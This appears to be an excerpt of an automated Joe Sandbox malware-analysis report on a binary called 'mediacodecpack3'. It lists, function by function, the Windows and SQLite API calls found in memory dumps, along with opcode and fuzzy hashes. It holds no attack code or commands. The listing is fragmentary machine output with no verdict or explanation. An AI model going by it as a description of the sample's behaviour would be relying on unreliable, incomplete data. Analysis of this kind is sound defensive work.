                                                                                            • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                            • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                            • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 3852931651-0
                                                                                            • Opcode ID: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                            • Instruction ID: 1973b5c1488275f86b32e201772009c48c68fd6130b56f6c31499d13724d529d
                                                                                            • Opcode Fuzzy Hash: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                            • Instruction Fuzzy Hash: 97418E72500219EFDF119F94DE86AAF3F78EB04350F11453AFA52F6290C73989608BE8
APIs
• sqlite3_free.SQLITE3(?), ref: 609476DD
  • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
• sqlite3_log.SQLITE3 ref: 609498F5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
• String ID: List of tree roots: $d$|
• API String ID: 3709608969-1164703836
APIs
  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
• sqlite3_column_int64.SQLITE3 ref: 609600BA
• sqlite3_column_text.SQLITE3 ref: 609600EF
• sqlite3_free.SQLITE3 ref: 6096029A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
• String ID: e
• API String ID: 786425071-4024072794
APIs
• GetVersionExA.KERNEL32 ref: 00403A3B
• GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: EnvironmentFileModuleNameVariableVersion
• String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
• API String ID: 1385375860-4131005785
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_exec
• String ID: sqlite_master$sqlite_temp_master$|
• API String ID: 2141490097-2247242311
APIs
  • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
• sqlite3_malloc.SQLITE3 ref: 6094B1D1
• sqlite3_value_bytes.SQLITE3 ref: 6094B24C
• sqlite3_malloc.SQLITE3 ref: 6094B272
• sqlite3_value_blob.SQLITE3 ref: 6094B298
• sqlite3_free.SQLITE3 ref: 6094B2C8
  • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
  • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
  • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
  • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
• String ID:
• API String ID: 683514883-0
APIs
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
• sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
• sqlite3_free.SQLITE3 ref: 6093A3BA
• sqlite3_free.SQLITE3 ref: 6093A3C2
  • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
  • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
  • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
• String ID:
• API String ID: 1903298374-0
APIs
• GetStartupInfoA.KERNEL32(?), ref: 0040389D
• GetFileType.KERNEL32(00000800), ref: 00403943
• GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
• GetFileType.KERNEL32(00000000), ref: 004039AA
• SetHandleCount.KERNEL32 ref: 004039E1
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
APIs
  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
• sqlite3_mutex_enter.SQLITE3 ref: 6093A114
• sqlite3_mutex_free.SQLITE3 ref: 6093A152
• sqlite3_mutex_leave.SQLITE3 ref: 6093A162
• sqlite3_free.SQLITE3 ref: 6093A1A4
• sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
• String ID:
• API String ID: 1894464702-0
APIs
  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
• sqlite3_mutex_leave.SQLITE3 ref: 609253C4
• sqlite3_log.SQLITE3 ref: 609253E2
• sqlite3_log.SQLITE3 ref: 60925406
• sqlite3_mutex_leave.SQLITE3 ref: 60925443
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 3336957480-0
                                                                                            • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                            • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                            APIs
                                                                                            • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                            • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                            • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                            • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                            • String ID:
                                                                                            • API String ID: 3091402450-0
                                                                                            • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                            • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                            • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                            • String ID:
                                                                                            • API String ID: 4225432645-0
                                                                                            • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                            • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                            • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                            • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                            • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                            • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ($string or blob too big$|
                                                                                            • API String ID: 632333372-2398534278
                                                                                            • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                            • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Protect$Query
                                                                                            • String ID: @
                                                                                            • API String ID: 3618607426-2766056989
                                                                                            • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                            • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                            • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                            • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                            • String ID: d
                                                                                            • API String ID: 211589378-2564639436
                                                                                            • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                            • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                            • API String ID: 1646373207-2713375476
                                                                                            • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                            • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                            • API String ID: 1646373207-3105848591
                                                                                            • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                            • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                            • Opcode Fuzzy Hash: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                            • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                            APIs
                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 714016831-0
                                                                                            • Opcode ID: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                            • Instruction ID: c10c021e120759eda6135e36457b27e0c23e5a43da849e4fe0a9db16ba58ca85
                                                                                            • Opcode Fuzzy Hash: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                            • Instruction Fuzzy Hash: 453142B65007029BD3309F24DD40B26B7E0EB88B54F10CA3AEA95B76D1E778A8448F4C
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 2313487548-0
                                                                                            • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                            • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                            • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                            • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
